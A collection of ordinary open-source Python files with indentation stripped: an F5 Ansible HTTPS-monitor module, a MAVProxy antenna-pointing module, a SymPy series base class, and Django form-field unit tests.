elif self._values['port'] == '*':
return '*'
return int(self._values['port'])
@property
def time_until_up(self):
if self._values['time_until_up'] is None:
return None
return int(self._values['time_until_up'])
@property
def parent(self):
if self._values['parent'] is None:
return None
result = fq_name(self.partition, self._values['parent'])
return result
@property
def type(self):
return 'https'
class ApiParameters(Parameters):
@property
def description(self):
if self._values['description'] in [None, 'none']:
return None
return self._values['description']
class ModuleParameters(Parameters):
@property
def description(self):
if self._values['description'] is None:
return None
elif self._values['description'] in ['none', '']:
return ''
return self._values['description']
@property
def ssl_profile(self):
if self._values['ssl_profile'] is None:
return None
if self._values['ssl_profile'] in ['', 'none']:
return ''
result = fq_name(self.partition, self._values['ssl_profile'])
return result
class Changes(Parameters):
def to_return(self):
result = {}
try:
for returnable in self.returnables:
result[returnable] = getattr(self, returnable)
result = self._filter_params(result)
except Exception:
pass
return result
class UsableChanges(Changes):
pass
class ReportableChanges(Changes):
pass
class Difference(object):
def __init__(self, want, have=None):
self.want = want
self.have = have
def compare(self, param):
try:
result = getattr(self, param)
return result
except AttributeError:
result = self.__default(param)
return result
@property
def parent(self):
if self.want.parent != self.have.parent:
raise F5ModuleError(
"The parent monitor cannot be changed"
)
@property
def destination(self):
if self.want.ip is None and self.want.port is None:
return None
if self.want.port is None:
self.want.update({'port': self.have.port})
if self.want.ip is None:
self.want.update({'ip': self.have.ip})
if self.want.port in [None, '*'] and self.want.ip != '*':
raise F5ModuleError(
"Specifying an IP address requires that a port number be specified"
)
if self.want.destination != self.have.destination:
return self.want.destination
@property
def interval(self):
if self.want.timeout is not None and self.want.interval is not None:
if self.want.interval >= self.want.timeout:
raise F5ModuleError(
"Parameter 'interval' must be less than 'timeout'."
)
elif self.want.timeout is not None:
if self.have.interval >= self.want.timeout:
raise F5ModuleError(
"Parameter 'interval' must be less than 'timeout'."
)
elif self.want.interval is not None:
if self.want.interval >= self.have.timeout:
raise F5ModuleError(
"Parameter 'interval' must be less than 'timeout'."
)
if self.want.interval != self.have.interval:
return self.want.interval
@property
def ssl_profile(self):
if self.want.ssl_profile is None:
return None
if self.want.ssl_profile == '' and self.have.ssl_profile is None:
return None
if self.want.ssl_profile != self.have.ssl_profile:
return self.want.ssl_profile
def __default(self, param):
attr1 = getattr(self.want, param)
try:
attr2 = getattr(self.have, param)
if attr1 != attr2:
return attr1
except AttributeError:
return attr1
@property
def description(self):
return cmp_str_with_none(self.want.description, self.have.description)
class ModuleManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.get('module', None)
self.client = kwargs.get('client', None)
self.want = ModuleParameters(params=self.module.params)
self.have = ApiParameters()
self.changes = UsableChanges()
def _set_changed_options(self):
changed = {}
for key in Parameters.returnables:
if getattr(self.want, key) is not None:
changed[key] = getattr(self.want, key)
if changed:
self.changes = UsableChanges(params=changed)
def _update_changed_options(self):
diff = Difference(self.want, self.have)
updatables = Parameters.updatables
changed = dict()
for k in updatables:
change = diff.compare(k)
if change is None:
continue
else:
if isinstance(change, dict):
changed.update(change)
else:
changed[k] = change
if changed:
self.changes = UsableChanges(params=changed)
return True
return False
def should_update(self):
result = self._update_changed_options()
if result:
return True
return False
def exec_module(self):
changed = False
result = dict()
state = self.want.state
if state == "present":
changed = self.present()
elif state == "absent":
changed = self.absent()
reportable = ReportableChanges(params=self.changes.to_return())
changes = reportable.to_return()
result.update(**changes)
result.update(dict(changed=changed))
self._announce_deprecations(result)
return result
def _announce_deprecations(self, result):
warnings = result.pop('__warnings', [])
for warning in warnings:
self.client.module.deprecate(
msg=warning['msg'],
version=warning['version']
)
def present(self):
if self.exists():
return self.update()
else:
return self.create()
def exists(self):
uri = "https://{0}:{1}/mgmt/tm/ltm/monitor/https/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError:
return False
if resp.status == 404 or 'code' in response and response['code'] == 404:
return False
return True
def update(self):
self.have = self.read_current_from_device()
if not self.should_update():
return False
if self.module.check_mode:
return True
self.update_on_device()
return True
def remove(self):
if self.module.check_mode:
return True
self.remove_from_device()
if self.exists():
raise F5ModuleError("Failed to delete the resource.")
return True
def create(self):
self._set_changed_options()
self._set_default_creation_values()
if self.module.check_mode:
return True
self.create_on_device()
return True
def _set_default_creation_values(self):
if self.want.timeout is None:
self.want.update({'timeout': 16})
if self.want.interval is None:
self.want.update({'interval': 5})
if self.want.time_until_up is None:
self.want.update({'time_until_up': 0})
if self.want.ip is None:
self.want.update({'ip': '*'})
if self.want.port is None:
self.want.update({'port': '*'})
if self.want.send is None:
self.want.update({'send': 'GET /\r\n'})
def create_on_device(self):
params = self.changes.api_params()
params['name'] = self.want.name
params['partition'] = self.want.partition
uri = "https://{0}:{1}/mgmt/tm/ltm/monitor/https/".format(
self.client.provider['server'],
self.client.provider['server_port']
)
resp = self.client.api.post(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] in [400, 403]:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
def update_on_device(self):
params = self.changes.api_params()
uri = "https://{0}:{1}/mgmt/tm/ltm/monitor/https/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.patch(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
def absent(self):
if self.exists():
return self.remove()
return False
def remove_from_device(self):
uri = "https://{0}:{1}/mgmt/tm/ltm/monitor/https/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.delete(uri)
if resp.status == 200:
return True
def read_current_from_device(self):
uri = "https://{0}:{1}/mgmt/tm/ltm/monitor/https/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
return ApiParameters(params=response)
class ArgumentSpec(object):
def __init__(self):
self.supports_check_mode = True
argument_spec = dict(
name=dict(required=True),
parent=dict(default='/Common/https'),
description=dict(),
send=dict(),
receive=dict(),
receive_disable=dict(required=False),
ip=dict(),
port=dict(type='int'),
interval=dict(type='int'),
timeout=dict(type='int'),
time_until_up=dict(type='int'),
target_username=dict(),
target_password=dict(no_log=True),
ssl_profile=dict(),
state=dict(
default='present',
choices=['present', 'absent']
),
partition=dict(
default='Common',
fallback=(env_fallback, ['F5_PARTITION'])
)
)
self.argument_spec = {}
self.argument_spec.update(f5_argument_spec)
self.argument_spec.update(argument_spec)
def main():
spec = ArgumentSpec()
module = AnsibleModule(
argument_spec=spec.argument_spec,
supports_check_mode=spec.supports_check_mode,
)
client = F5RestClient(**module.params)
try:
mm = ModuleManager(module=module, client=client)
results = mm.exec_module()
cleanup_tokens(client)
exit_json(module, results, client)
except F5ModuleError as ex:
cleanup_tokens(client)
fail_json(module, ex, client)
if __name__ == '__main__':
main()
|
aitormf/JdeRobot | refs/heads/master | src/drivers/MAVLinkServer/MAVProxy/modules/mavproxy_antenna.py | 16 | #!/usr/bin/env python
'''
antenna pointing module
Andrew Tridgell
June 2012
'''
import sys, os, time
from cuav.lib import cuav_util
from MAVProxy.modules.lib import mp_module
class AntennaModule(mp_module.MPModule):
def __init__(self, mpstate):
super(AntennaModule, self).__init__(mpstate, "antenna", "antenna pointing module")
self.gcs_location = None
self.last_bearing = 0
self.last_announce = 0
self.add_command('antenna', self.cmd_antenna, "antenna link control")
def cmd_antenna(self, args):
'''set gcs location'''
if len(args) != 2:
if self.gcs_location is None:
print("GCS location not set")
else:
print("GCS location %s" % str(self.gcs_location))
return
self.gcs_location = (float(args[0]), float(args[1]))
def mavlink_packet(self, m):
'''handle an incoming mavlink packet'''
if self.gcs_location is None and self.module('wp').wploader.count() > 0:
home = self.module('wp').wploader.wp(0)
self.gcs_location = (home.x, home.y)
print("Antenna home set")
if self.gcs_location is None:
return
if m.get_type() == 'GPS_RAW' and self.gcs_location is not None:
(gcs_lat, gcs_lon) = self.gcs_location
bearing = cuav_util.gps_bearing(gcs_lat, gcs_lon, m.lat, m.lon)
elif m.get_type() == 'GPS_RAW_INT' and self.gcs_location is not None:
(gcs_lat, gcs_lon) = self.gcs_location
bearing = cuav_util.gps_bearing(gcs_lat, gcs_lon, m.lat / 1.0e7, m.lon / 1.0e7)
else:
return
self.console.set_status('Antenna', 'Antenna %.0f' % bearing, row=0)
if abs(bearing - self.last_bearing) > 5 and (time.time() - self.last_announce) > 15:
self.last_bearing = bearing
self.last_announce = time.time()
self.say("Antenna %u" % int(bearing + 0.5))
def init(mpstate):
'''initialise module'''
return AntennaModule(mpstate)
|
oliverlee/sympy | refs/heads/master | sympy/series/series_class.py | 89 | """
Contains the base class for series
Made using sequences in mind
"""
from __future__ import print_function, division
from sympy.core.expr import Expr
from sympy.core.singleton import S
from sympy.core.cache import cacheit
from sympy.core.compatibility import integer_types
class SeriesBase(Expr):
"""Base Class for series"""
@property
def interval(self):
"""The interval on which the series is defined"""
raise NotImplementedError("(%s).interval" % self)
@property
def start(self):
"""The starting point of the series. This point is included"""
raise NotImplementedError("(%s).start" % self)
@property
def stop(self):
"""The ending point of the series. This point is included"""
raise NotImplementedError("(%s).stop" % self)
@property
def length(self):
"""Length of the series expansion"""
raise NotImplementedError("(%s).length" % self)
@property
def variables(self):
"""Returns a tuple of variables that are bounded"""
return ()
@property
def free_symbols(self):
"""
This method returns the symbols in the object, excluding those
that take on a specific value (i.e. the dummy symbols).
"""
return (set(j for i in self.args for j in i.free_symbols)
.difference(self.variables))
@cacheit
def term(self, pt):
"""Term at point pt of a series"""
if pt < self.start or pt > self.stop:
raise IndexError("Index %s out of bounds %s" % (pt, self.interval))
return self._eval_term(pt)
def _eval_term(self, pt):
raise NotImplementedError("The _eval_term method should be added to"
"%s to return series term so it is available"
"when 'term' calls it."
% self.func)
def _ith_point(self, i):
"""
Returns the i'th point of a series
If start point is negative infinity, point is returned from the end.
Assumes the first point to be indexed zero.
Examples
========
TODO
"""
if self.start is S.NegativeInfinity:
initial = self.stop
step = -1
else:
initial = self.start
step = 1
return initial + i*step
def __iter__(self):
i = 0
while i < self.length:
pt = self._ith_point(i)
yield self.term(pt)
i += 1
def __getitem__(self, index):
if isinstance(index, integer_types):
index = self._ith_point(index)
return self.term(index)
elif isinstance(index, slice):
start, stop = index.start, index.stop
if start is None:
start = 0
if stop is None:
stop = self.length
return [self.term(self._ith_point(i)) for i in
range(start, stop, index.step or 1)]
|
binbin91/oms | refs/heads/master | asset/tests.py | 24123 | from django.test import TestCase
# Create your tests here.
|
DasIch/django | refs/heads/master | tests/forms_tests/tests/test_fields.py | 64 | # -*- coding: utf-8 -*-
"""
##########
# Fields #
##########
Each Field class does some sort of validation. Each Field has a clean() method,
which either raises django.forms.ValidationError or returns the "clean"
data -- usually a Unicode object, but, in some rare cases, a list.
Each Field's __init__() takes at least these parameters:
required -- Boolean that specifies whether the field is required.
True by default.
widget -- A Widget class, or instance of a Widget class, that should be
used for this Field when displaying it. Each Field has a default
Widget that it'll use if you don't specify this. In most cases,
the default widget is TextInput.
label -- A verbose name for this field, for use in displaying this field in
a form. By default, Django will use a "pretty" version of the form
field name, if the Field is part of a Form.
initial -- A value to use in this Field's initial display. This value is
*not* used as a fallback if data isn't given.
Other than that, the Field subclasses have class-specific options for
__init__(). For example, CharField has a max_length option.
"""
from __future__ import unicode_literals
import datetime
import os
import pickle
import re
import uuid
from decimal import Decimal
from unittest import skipIf
from django.core.files.uploadedfile import SimpleUploadedFile
from django.forms import (
BooleanField, CharField, ChoiceField, ComboField, DateField, DateTimeField,
DecimalField, DurationField, EmailField, Field, FileField, FilePathField,
FloatField, Form, GenericIPAddressField, HiddenInput, ImageField,
IntegerField, MultipleChoiceField, NullBooleanField, NumberInput,
PasswordInput, RadioSelect, RegexField, SlugField, SplitDateTimeField,
Textarea, TextInput, TimeField, TypedChoiceField, TypedMultipleChoiceField,
URLField, UUIDField, ValidationError, Widget, forms,
)
from django.test import SimpleTestCase
from django.utils import formats, six, translation
from django.utils._os import upath
from django.utils.duration import duration_string
try:
from PIL import Image
except ImportError:
Image = None
def fix_os_paths(x):
if isinstance(x, six.string_types):
return x.replace('\\', '/')
elif isinstance(x, tuple):
return tuple(fix_os_paths(list(x)))
elif isinstance(x, list):
return [fix_os_paths(y) for y in x]
else:
return x
class FieldsTests(SimpleTestCase):
def assertWidgetRendersTo(self, field, to):
class _Form(Form):
f = field
self.assertHTMLEqual(str(_Form()['f']), to)
def test_field_sets_widget_is_required(self):
self.assertTrue(Field(required=True).widget.is_required)
self.assertFalse(Field(required=False).widget.is_required)
def test_cooperative_multiple_inheritance(self):
class A(object):
def __init__(self):
self.class_a_var = True
super(A, self).__init__()
class ComplexField(Field, A):
def __init__(self):
super(ComplexField, self).__init__()
f = ComplexField()
self.assertTrue(f.class_a_var)
# CharField ###################################################################
def test_charfield_1(self):
f = CharField()
self.assertEqual('1', f.clean(1))
self.assertEqual('hello', f.clean('hello'))
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertEqual('[1, 2, 3]', f.clean([1, 2, 3]))
self.assertEqual(f.max_length, None)
self.assertEqual(f.min_length, None)
def test_charfield_2(self):
f = CharField(required=False)
self.assertEqual('1', f.clean(1))
self.assertEqual('hello', f.clean('hello'))
self.assertEqual('', f.clean(None))
self.assertEqual('', f.clean(''))
self.assertEqual('[1, 2, 3]', f.clean([1, 2, 3]))
self.assertEqual(f.max_length, None)
self.assertEqual(f.min_length, None)
def test_charfield_3(self):
f = CharField(max_length=10, required=False)
self.assertEqual('12345', f.clean('12345'))
self.assertEqual('1234567890', f.clean('1234567890'))
msg = "'Ensure this value has at most 10 characters (it has 11).'"
with self.assertRaisesMessage(ValidationError, msg):
f.clean('1234567890a')
self.assertEqual(f.max_length, 10)
self.assertEqual(f.min_length, None)
def test_charfield_4(self):
f = CharField(min_length=10, required=False)
self.assertEqual('', f.clean(''))
msg = "'Ensure this value has at least 10 characters (it has 5).'"
with self.assertRaisesMessage(ValidationError, msg):
f.clean('12345')
self.assertEqual('1234567890', f.clean('1234567890'))
self.assertEqual('1234567890a', f.clean('1234567890a'))
self.assertEqual(f.max_length, None)
self.assertEqual(f.min_length, 10)
def test_charfield_5(self):
f = CharField(min_length=10, required=True)
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
msg = "'Ensure this value has at least 10 characters (it has 5).'"
with self.assertRaisesMessage(ValidationError, msg):
f.clean('12345')
self.assertEqual('1234567890', f.clean('1234567890'))
self.assertEqual('1234567890a', f.clean('1234567890a'))
self.assertEqual(f.max_length, None)
self.assertEqual(f.min_length, 10)
def test_charfield_length_not_int(self):
"""
Ensure that setting min_length or max_length to something that is not a
number returns an exception.
"""
self.assertRaises(ValueError, CharField, min_length='a')
self.assertRaises(ValueError, CharField, max_length='a')
self.assertRaises(ValueError, CharField, 'a')
def test_charfield_widget_attrs(self):
"""
Ensure that CharField.widget_attrs() always returns a dictionary.
Refs #15912
"""
# Return an empty dictionary if max_length is None
f = CharField()
self.assertEqual(f.widget_attrs(TextInput()), {})
self.assertEqual(f.widget_attrs(Textarea()), {})
# Otherwise, return a maxlength attribute equal to max_length
f = CharField(max_length=10)
self.assertEqual(f.widget_attrs(TextInput()), {'maxlength': '10'})
self.assertEqual(f.widget_attrs(PasswordInput()), {'maxlength': '10'})
self.assertEqual(f.widget_attrs(Textarea()), {'maxlength': '10'})
def test_charfield_strip(self):
"""
Ensure that values have whitespace stripped and that strip=False works.
"""
f = CharField()
self.assertEqual(f.clean(' 1'), '1')
self.assertEqual(f.clean('1 '), '1')
f = CharField(strip=False)
self.assertEqual(f.clean(' 1'), ' 1')
self.assertEqual(f.clean('1 '), '1 ')
def test_charfield_disabled(self):
f = CharField(disabled=True)
self.assertWidgetRendersTo(f, '<input type="text" name="f" id="id_f" disabled />')
# IntegerField ################################################################
def test_integerfield_1(self):
f = IntegerField()
self.assertWidgetRendersTo(f, '<input type="number" name="f" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(1, f.clean('1'))
self.assertIsInstance(f.clean('1'), int)
self.assertEqual(23, f.clean('23'))
self.assertRaisesMessage(ValidationError, "'Enter a whole number.'", f.clean, 'a')
self.assertEqual(42, f.clean(42))
self.assertRaisesMessage(ValidationError, "'Enter a whole number.'", f.clean, 3.14)
self.assertEqual(1, f.clean('1 '))
self.assertEqual(1, f.clean(' 1'))
self.assertEqual(1, f.clean(' 1 '))
self.assertRaisesMessage(ValidationError, "'Enter a whole number.'", f.clean, '1a')
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, None)
def test_integerfield_2(self):
f = IntegerField(required=False)
self.assertIsNone(f.clean(''))
self.assertEqual('None', repr(f.clean('')))
self.assertIsNone(f.clean(None))
self.assertEqual('None', repr(f.clean(None)))
self.assertEqual(1, f.clean('1'))
self.assertIsInstance(f.clean('1'), int)
self.assertEqual(23, f.clean('23'))
self.assertRaisesMessage(ValidationError, "'Enter a whole number.'", f.clean, 'a')
self.assertEqual(1, f.clean('1 '))
self.assertEqual(1, f.clean(' 1'))
self.assertEqual(1, f.clean(' 1 '))
self.assertRaisesMessage(ValidationError, "'Enter a whole number.'", f.clean, '1a')
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, None)
def test_integerfield_3(self):
f = IntegerField(max_value=10)
self.assertWidgetRendersTo(f, '<input max="10" type="number" name="f" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(1, f.clean(1))
self.assertEqual(10, f.clean(10))
self.assertRaisesMessage(ValidationError, "'Ensure this value is less than or equal to 10.'", f.clean, 11)
self.assertEqual(10, f.clean('10'))
self.assertRaisesMessage(ValidationError, "'Ensure this value is less than or equal to 10.'", f.clean, '11')
self.assertEqual(f.max_value, 10)
self.assertEqual(f.min_value, None)
def test_integerfield_4(self):
f = IntegerField(min_value=10)
self.assertWidgetRendersTo(f, '<input id="id_f" type="number" name="f" min="10" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertRaisesMessage(ValidationError, "'Ensure this value is greater than or equal to 10.'", f.clean, 1)
self.assertEqual(10, f.clean(10))
self.assertEqual(11, f.clean(11))
self.assertEqual(10, f.clean('10'))
self.assertEqual(11, f.clean('11'))
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, 10)
def test_integerfield_5(self):
f = IntegerField(min_value=10, max_value=20)
self.assertWidgetRendersTo(f, '<input id="id_f" max="20" type="number" name="f" min="10" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertRaisesMessage(ValidationError, "'Ensure this value is greater than or equal to 10.'", f.clean, 1)
self.assertEqual(10, f.clean(10))
self.assertEqual(11, f.clean(11))
self.assertEqual(10, f.clean('10'))
self.assertEqual(11, f.clean('11'))
self.assertEqual(20, f.clean(20))
self.assertRaisesMessage(ValidationError, "'Ensure this value is less than or equal to 20.'", f.clean, 21)
self.assertEqual(f.max_value, 20)
self.assertEqual(f.min_value, 10)
def test_integerfield_localized(self):
"""
Make sure localized IntegerField's widget renders to a text input with
no number input specific attributes.
"""
f1 = IntegerField(localize=True)
self.assertWidgetRendersTo(f1, '<input id="id_f" name="f" type="text" />')
def test_integerfield_float(self):
f = IntegerField()
self.assertEqual(1, f.clean(1.0))
self.assertEqual(1, f.clean('1.0'))
self.assertEqual(1, f.clean(' 1.0 '))
self.assertEqual(1, f.clean('1.'))
self.assertEqual(1, f.clean(' 1. '))
self.assertRaisesMessage(ValidationError, "'Enter a whole number.'", f.clean, '1.5')
self.assertRaisesMessage(ValidationError, "'Enter a whole number.'", f.clean, '…')
def test_integerfield_big_num(self):
f = IntegerField()
self.assertEqual(9223372036854775808, f.clean(9223372036854775808))
self.assertEqual(9223372036854775808, f.clean('9223372036854775808'))
self.assertEqual(9223372036854775808, f.clean('9223372036854775808.0'))
def test_integerfield_subclass(self):
"""
Test that class-defined widget is not overwritten by __init__ (#22245).
"""
class MyIntegerField(IntegerField):
widget = Textarea
f = MyIntegerField()
self.assertEqual(f.widget.__class__, Textarea)
f = MyIntegerField(localize=True)
self.assertEqual(f.widget.__class__, Textarea)
# FloatField ##################################################################
def test_floatfield_1(self):
f = FloatField()
self.assertWidgetRendersTo(f, '<input step="any" type="number" name="f" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(1.0, f.clean('1'))
self.assertIsInstance(f.clean('1'), float)
self.assertEqual(23.0, f.clean('23'))
self.assertEqual(3.1400000000000001, f.clean('3.14'))
self.assertEqual(3.1400000000000001, f.clean(3.14))
self.assertEqual(42.0, f.clean(42))
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, 'a')
self.assertEqual(1.0, f.clean('1.0 '))
self.assertEqual(1.0, f.clean(' 1.0'))
self.assertEqual(1.0, f.clean(' 1.0 '))
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, '1.0a')
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, None)
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, 'Infinity')
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, 'NaN')
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, '-Inf')
def test_floatfield_2(self):
f = FloatField(required=False)
self.assertIsNone(f.clean(''))
self.assertIsNone(f.clean(None))
self.assertEqual(1.0, f.clean('1'))
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, None)
def test_floatfield_3(self):
f = FloatField(max_value=1.5, min_value=0.5)
self.assertWidgetRendersTo(f, '<input step="any" name="f" min="0.5" max="1.5" type="number" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'Ensure this value is less than or equal to 1.5.'", f.clean, '1.6')
self.assertRaisesMessage(
ValidationError, "'Ensure this value is greater than or equal to 0.5.'",
f.clean, '0.4'
)
self.assertEqual(1.5, f.clean('1.5'))
self.assertEqual(0.5, f.clean('0.5'))
self.assertEqual(f.max_value, 1.5)
self.assertEqual(f.min_value, 0.5)
def test_floatfield_widget_attrs(self):
f = FloatField(widget=NumberInput(attrs={'step': 0.01, 'max': 1.0, 'min': 0.0}))
self.assertWidgetRendersTo(f, '<input step="0.01" name="f" min="0.0" max="1.0" type="number" id="id_f" />')
def test_floatfield_localized(self):
"""
Make sure localized FloatField's widget renders to a text input with
no number input specific attributes.
"""
f = FloatField(localize=True)
self.assertWidgetRendersTo(f, '<input id="id_f" name="f" type="text" />')
def test_floatfield_changed(self):
f = FloatField()
n = 4.35
self.assertFalse(f.has_changed(n, '4.3500'))
with translation.override('fr'), self.settings(USE_L10N=True):
f = FloatField(localize=True)
localized_n = formats.localize_input(n) # -> '4,35' in French
self.assertFalse(f.has_changed(n, localized_n))
# DecimalField ################################################################
def test_decimalfield_1(self):
f = DecimalField(max_digits=4, decimal_places=2)
self.assertWidgetRendersTo(f, '<input id="id_f" step="0.01" type="number" name="f" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(f.clean('1'), Decimal("1"))
self.assertIsInstance(f.clean('1'), Decimal)
self.assertEqual(f.clean('23'), Decimal("23"))
self.assertEqual(f.clean('3.14'), Decimal("3.14"))
self.assertEqual(f.clean(3.14), Decimal("3.14"))
self.assertEqual(f.clean(Decimal('3.14')), Decimal("3.14"))
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, 'NaN')
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, 'Inf')
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, '-Inf')
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, 'a')
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, 'łąść')
self.assertEqual(f.clean('1.0 '), Decimal("1.0"))
self.assertEqual(f.clean(' 1.0'), Decimal("1.0"))
self.assertEqual(f.clean(' 1.0 '), Decimal("1.0"))
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, '1.0a')
self.assertRaisesMessage(
ValidationError, "'Ensure that there are no more than 4 digits in total.'",
f.clean, '123.45'
)
self.assertRaisesMessage(
ValidationError, "'Ensure that there are no more than 2 decimal places.'",
f.clean, '1.234'
)
self.assertRaisesMessage(
ValidationError, "'Ensure that there are no more than 2 digits before the decimal point.'",
f.clean, '123.4'
)
self.assertEqual(f.clean('-12.34'), Decimal("-12.34"))
self.assertRaisesMessage(
ValidationError, "'Ensure that there are no more than 4 digits in total.'",
f.clean, '-123.45'
)
self.assertEqual(f.clean('-.12'), Decimal("-0.12"))
self.assertEqual(f.clean('-00.12'), Decimal("-0.12"))
self.assertEqual(f.clean('-000.12'), Decimal("-0.12"))
self.assertRaisesMessage(
ValidationError, "'Ensure that there are no more than 2 decimal places.'",
f.clean, '-000.123'
)
self.assertRaisesMessage(
ValidationError, "'Ensure that there are no more than 4 digits in total.'",
f.clean, '-000.12345'
)
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, '--0.12')
self.assertEqual(f.max_digits, 4)
self.assertEqual(f.decimal_places, 2)
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, None)
def test_decimalfield_2(self):
f = DecimalField(max_digits=4, decimal_places=2, required=False)
self.assertIsNone(f.clean(''))
self.assertIsNone(f.clean(None))
self.assertEqual(f.clean('1'), Decimal("1"))
self.assertEqual(f.max_digits, 4)
self.assertEqual(f.decimal_places, 2)
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, None)
def test_decimalfield_3(self):
f = DecimalField(max_digits=4, decimal_places=2, max_value=Decimal('1.5'), min_value=Decimal('0.5'))
self.assertWidgetRendersTo(f, '<input step="0.01" name="f" min="0.5" max="1.5" type="number" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'Ensure this value is less than or equal to 1.5.'", f.clean, '1.6')
self.assertRaisesMessage(
ValidationError, "'Ensure this value is greater than or equal to 0.5.'",
f.clean, '0.4'
)
self.assertEqual(f.clean('1.5'), Decimal("1.5"))
self.assertEqual(f.clean('0.5'), Decimal("0.5"))
self.assertEqual(f.clean('.5'), Decimal("0.5"))
self.assertEqual(f.clean('00.50'), Decimal("0.50"))
self.assertEqual(f.max_digits, 4)
self.assertEqual(f.decimal_places, 2)
self.assertEqual(f.max_value, Decimal('1.5'))
self.assertEqual(f.min_value, Decimal('0.5'))
def test_decimalfield_4(self):
f = DecimalField(decimal_places=2)
self.assertRaisesMessage(
ValidationError, "'Ensure that there are no more than 2 decimal places.'",
f.clean, '0.00000001'
)
def test_decimalfield_5(self):
f = DecimalField(max_digits=3)
# Leading whole zeros "collapse" to one digit.
self.assertEqual(f.clean('0000000.10'), Decimal("0.1"))
# But a leading 0 before the . doesn't count towards max_digits
self.assertEqual(f.clean('0000000.100'), Decimal("0.100"))
# Only leading whole zeros "collapse" to one digit.
self.assertEqual(f.clean('000000.02'), Decimal('0.02'))
self.assertRaisesMessage(
ValidationError, "'Ensure that there are no more than 3 digits in total.'",
f.clean, '000000.0002'
)
self.assertEqual(f.clean('.002'), Decimal("0.002"))
def test_decimalfield_6(self):
f = DecimalField(max_digits=2, decimal_places=2)
self.assertEqual(f.clean('.01'), Decimal(".01"))
self.assertRaisesMessage(
ValidationError, "'Ensure that there are no more than 0 digits before the decimal point.'",
f.clean, '1.1'
)
def test_decimalfield_scientific(self):
f = DecimalField(max_digits=2, decimal_places=2)
self.assertEqual(f.clean('1E+2'), Decimal('1E+2'))
self.assertEqual(f.clean('1e+2'), Decimal('1E+2'))
with self.assertRaisesMessage(ValidationError, "Ensure that there are no more"):
f.clean('0.546e+2')
def test_decimalfield_widget_attrs(self):
f = DecimalField(max_digits=6, decimal_places=2)
self.assertEqual(f.widget_attrs(Widget()), {})
self.assertEqual(f.widget_attrs(NumberInput()), {'step': '0.01'})
f = DecimalField(max_digits=10, decimal_places=0)
self.assertEqual(f.widget_attrs(NumberInput()), {'step': '1'})
f = DecimalField(max_digits=19, decimal_places=19)
self.assertEqual(f.widget_attrs(NumberInput()), {'step': '1e-19'})
f = DecimalField(max_digits=20)
self.assertEqual(f.widget_attrs(NumberInput()), {'step': 'any'})
f = DecimalField(max_digits=6, widget=NumberInput(attrs={'step': '0.01'}))
self.assertWidgetRendersTo(f, '<input step="0.01" name="f" type="number" id="id_f" />')
def test_decimalfield_localized(self):
"""
Make sure localized DecimalField's widget renders to a text input with
no number input specific attributes.
"""
f = DecimalField(localize=True)
self.assertWidgetRendersTo(f, '<input id="id_f" name="f" type="text" />')
def test_decimalfield_changed(self):
f = DecimalField(max_digits=2, decimal_places=2)
d = Decimal("0.1")
self.assertFalse(f.has_changed(d, '0.10'))
self.assertTrue(f.has_changed(d, '0.101'))
with translation.override('fr'), self.settings(USE_L10N=True):
f = DecimalField(max_digits=2, decimal_places=2, localize=True)
localized_d = formats.localize_input(d) # -> '0,1' in French
self.assertFalse(f.has_changed(d, localized_d))
# DateField ###################################################################
def test_datefield_1(self):
f = DateField()
